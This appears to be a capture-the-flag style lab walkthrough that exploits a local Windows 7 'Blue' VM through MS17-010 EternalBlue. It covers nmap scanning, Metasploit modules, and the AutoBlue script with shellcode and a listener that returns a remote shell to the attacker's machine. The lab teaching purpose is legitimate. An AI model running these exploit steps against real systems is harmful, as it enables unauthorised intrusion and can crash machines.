Ever wondered how far you can push a machine before it breaks? This walkthrough explores unconventional methods to interact with the Blue machine.
The password for the machine is:
user- Password123!
admin- Password456!
The admin password is required to get the machine's IP address.
Using
ipconfig
On our kali terminal we run the ping command to verify if our machine is online and can communicate with our kali machine using the command:
ping 192.168.59.133
NB- Make sure to change the IP address to your target's IP address
The packets received shows that the machine is online so we run NMAP scan to discover which ports are open using the command:
nmap -p- -A 192.168.59.133
From the image above port 445 is open and the highlighted part of the image shows that the windows 7 ultimate is SMB related which is known to be vulnerable, so we do a google search to search for "Windows 7 Ultimate 7601 Service Pack 1 exploit"
After much enumeration it seems the exploit for the windows 7 is popularly known as "MS17-010 EternalBlue"
So we turn on metasploit using the command:
msfconsole
And then we input the command:
search eternalblue
You can also try using:
search MS17-010
We need to first confirm if the machine is vulnerable to the exploit and there are two ways we can do this using either auxiliary scanner or the exploit itself.
Using the auxiliary scanner:
From the result gotten after searching for the exploit using metasploit the scanner to be used for this is "auxiliary/scanner/smb/smb_ms17_010" which is Number 24 for me (yours might be different).
So input the command:
use 24
NB- use whatever number your scanner shows
To view details input the command:
options
Now set rhosts to your target IP address:
set rhosts 192.168.59.133
Input the command to confirm details:
options
Now input the command:
run
It shows us that the host is likely vulnerable to the exploit chosen.
Now we search the exploit again using the command:
search eternalblue
The option we want to use is the "exploit/windows/smb/ms17_010_eternalblue" which for me is option 0, so input the command:
use 0
And then we input the command:
options
Now we set our rhosts to the target's IP address using the command:
set rhosts 192.168.59.133
and
options
to confirm changes.
Now! Input the command:
check
The image shows that the target is vulnerable (This is the second way to scan if the machine is vulnerable to the exploit)
Now to run the exploit, we input the command:
run
OR
exploit
Depending on how cool you want to feel(wink)
THE MACHINE HAS BEEN SUCCESSFULLY EXPLOITED.
MANUAL EXPLOITATION
We start by searching for "eternalblue github" because the exploit I want to use is on github.
From the search results choose the one from 3ndG4me github
Now on kali, move into the /opt/ folder using the command:
cd /opt/
NB- The /opt folder in Kali Linux is for optional add-on software packages. This means it stores software that isn't part of the core Kali system itself.
On the github page, click on code and copy the https link
Now input the command:
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
NB- for this exploit make sure you are using root user or you'd experience the error has seen below
Switch to root using:
sudo su root
and then input your root password if it requests for it.
Now re-run the command:
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
The command is now successful and an autoblue directory has been created.
Move into the autoblue directory using the command:
cd AutoBlue-MS17-010/
Input the command:
pip install -r requirements.txt
Move into the shellcode directory using the command:
cd shellcode
and then run shell prep using the command:
./shell_prep.sh
Enter y for the question.
Then enter your kali IP address(That is your local host known as lhost)
Enter a port number you know is free for x64, for me I'm using 9999
And enter another port number for x86, for me I'm using 2222
For the shell I want to use a regular cmd shell because I already used a meterpreter shell for the msfconsole exploit, so using either one will work, but I'm using the cmd
So input the command:
1
And for the payload input the command:
0
to select the staged payload.
(the staged or stageless payload should work but for me I'm using the staged)
Now that is done we need to go back and execute listener
We go back by inputting the command:
cd ..
Now input the command:
./listener_prep.sh
NB- The command above is running a listener for us in metasploit.
So now we fill the details as we filled them before by inputting the same details for the lhost,ports, regular cmd and staged payload.
Now all that's left is for us to run the exploit.
For that open a new tab by clicking on file and then new tab to open a new tab.
On the new tab, switch to root, move to /opt/ and then cd into autoblue directory
Now! Run the command:
python eternalblue_exploit7.py 192.168.59.133 shellcode/sc_all.bin
NB- Change the IP address to your blue machine IP address.
The image below shows the blue machine before running the exploit:
The image below shows the blue machine after running the exploit:
The image below shows kali's output:
The exploit was successful and also ended up crashing the system.
This is a perfect example of why when running a penetration test, you need to keep the people or organisation informed before running an exploit because you could have tipped over an important machine that's being used.
SOME CHALLENGES YOU MIGHT FACE WHEN DOING THIS LAB EXPERIMENT
If your machine ends up showing up like it did in the image above, you will need to delete it and reinstall the machine.
Once you've done that, login with the administrator password and get your IP address and then log out and stay on the page as seen below:
Once your machines home page changes from the natural blue to black background then you will need to uninstall and re-install the machine.
Blue background like this signifies the machine is alive and will communicate well with your kali.
Black background like this indicates something has gone wrong, so make sure to re-install the machine.
GOODLUCK!
Top comments (0)